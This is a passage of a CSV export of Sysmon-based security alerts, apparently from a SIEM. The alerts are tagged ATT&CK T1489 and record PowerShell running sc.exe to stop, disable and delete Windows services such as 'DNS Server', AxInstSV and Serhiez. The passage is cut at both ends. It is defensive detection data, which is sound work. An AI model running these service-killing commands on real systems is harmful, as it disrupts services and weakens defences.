""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Serhiez",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:35.863054700Z"",""eventRecordID"":""2183"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:35.861\r\nProcessGuid: {df9fc3d3-b35f-5ecf-0000-0010e4a01900}\r\nProcessId: 7764\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Serhiez\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:35.861"",""processGuid"":""{df9fc3d3-b35f-5ecf-0000-0010e4a01900}"",""processId"":""7764"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Serhiez"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:04.451",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:35.847 +ProcessGuid: {df9fc3d3-b35f-5ecf-0000-0010fa9f1900} +ProcessId: 7740 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config Serhiez Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config Serhiez Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:35.848799700Z"",""eventRecordID"":""2182"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:35.847\r\nProcessGuid: {df9fc3d3-b35f-5ecf-0000-0010fa9f1900}\r\nProcessId: 7740\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config Serhiez Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:35.847"",""processGuid"":""{df9fc3d3-b35f-5ecf-0000-0010fa9f1900}"",""processId"":""7740"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config Serhiez Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:04.385",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:35.817 +ProcessGuid: {df9fc3d3-b35f-5ecf-0000-0010109e1900} +ProcessId: 7688 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ""DNS Server"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \""DNS Server\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:35.819041100Z"",""eventRecordID"":""2180"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:35.817\r\nProcessGuid: {df9fc3d3-b35f-5ecf-0000-0010109e1900}\r\nProcessId: 7688\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \""DNS Server\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:35.817"",""processGuid"":""{df9fc3d3-b35f-5ecf-0000-0010109e1900}"",""processId"":""7688"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\""DNS Server\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:04.338",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:35.775 +ProcessGuid: {df9fc3d3-b35f-5ecf-0000-00107f9b1900} +ProcessId: 7612 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Zational +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Zational",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:35.778027300Z"",""eventRecordID"":""2177"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:35.775\r\nProcessGuid: {df9fc3d3-b35f-5ecf-0000-00107f9b1900}\r\nProcessId: 7612\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Zational\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:35.775"",""processGuid"":""{df9fc3d3-b35f-5ecf-0000-00107f9b1900}"",""processId"":""7612"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Zational"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:04.294",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:35.754 +ProcessGuid: {df9fc3d3-b35f-5ecf-0000-0010ec991900} +ProcessId: 7556 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete AxInstSV +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete AxInstSV",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:35.756176800Z"",""eventRecordID"":""2175"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:35.754\r\nProcessGuid: {df9fc3d3-b35f-5ecf-0000-0010ec991900}\r\nProcessId: 7556\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete AxInstSV\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:35.754"",""processGuid"":""{df9fc3d3-b35f-5ecf-0000-0010ec991900}"",""processId"":""7556"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete AxInstSV"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:04.274",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:35.741 +ProcessGuid: {df9fc3d3-b35f-5ecf-0000-001023991900} +ProcessId: 7528 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop AxInstSV +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop AxInstSV",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:35.744244900Z"",""eventRecordID"":""2174"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:35.741\r\nProcessGuid: {df9fc3d3-b35f-5ecf-0000-001023991900}\r\nProcessId: 7528\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop AxInstSV\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:35.741"",""processGuid"":""{df9fc3d3-b35f-5ecf-0000-001023991900}"",""processId"":""7528"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop AxInstSV"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:04.228",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:35.704 +ProcessGuid: {df9fc3d3-b35f-5ecf-0000-0010c7961900} +ProcessId: 7452 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop clr_optimization +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop clr_optimization",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:35.706455400Z"",""eventRecordID"":""2171"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:35.704\r\nProcessGuid: {df9fc3d3-b35f-5ecf-0000-0010c7961900}\r\nProcessId: 7452\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: 